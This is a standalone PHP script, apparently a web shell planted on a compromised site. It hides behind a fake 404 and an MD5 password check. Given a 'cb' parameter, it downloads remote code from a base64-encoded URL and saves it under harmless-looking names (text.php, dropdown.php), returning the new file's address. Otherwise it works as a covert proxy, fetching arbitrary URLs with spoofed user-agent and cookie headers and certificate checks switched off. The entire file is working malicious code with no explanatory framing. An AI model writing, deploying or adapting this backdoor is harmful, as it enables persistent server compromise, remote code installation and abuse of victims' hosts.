<?php
if(isset($_REQUEST['ex'])){
    exit('1');
}

if(!isset($_REQUEST['pw'])){
    http_response_code(404);
	exit();
}

if(md5($_REQUEST['pw'])!='ffc52a7aef7b90a27c1fbaec516a4f0e'){
    exit('pw error');
}

if(isset($_REQUEST['cb'])){
    $cb = @file_get_contents(base64_decode($_REQUEST['cb']));
    $file_name_arr = ['text.php','dropdown.php'];
    $fid = rand(0,count($file_name_arr)-1);
    @file_put_contents($file_name_arr[$fid],$cb);
    $self = $_SERVER['PHP_SELF'];
    $self_arr = explode('/',$self);            
    $cb_url = $_SERVER['REQUEST_SCHEME'].'://'.$_SERVER['HTTP_HOST'].str_replace($self_arr[count($self_arr)-1],$file_name_arr[$fid],$self);
    exit($cb_url);
}

if(!isset($_REQUEST['url'])){    
    exit('no url');
}

$url=base64_decode($_REQUEST['url']);

$param = array();
if(isset($_REQUEST['al'])){
    $param[] = "Accept-Language:".base64_decode($_REQUEST['al']);
}else{
    //$param[] = "Accept-Language:ja, en-GB; q=0.7,en; q=0.3";
}

if(isset($_REQUEST['ua'])){
    $param[] = "User-Agent:".base64_decode($_REQUEST['ua']);
}else{
    $param[] = "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763";
}

if(isset($_REQUEST['ck'])){
    $param[] = "cookie:".base64_decode($_REQUEST['ck']);
}

echo get($url,$param);
exit("<-- end -->");


function get($url, $param) {    
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($curl, CURLOPT_HTTPHEADER, $param);
    $data = curl_exec($curl);
    curl_close($curl);
    return $data;
} 
?>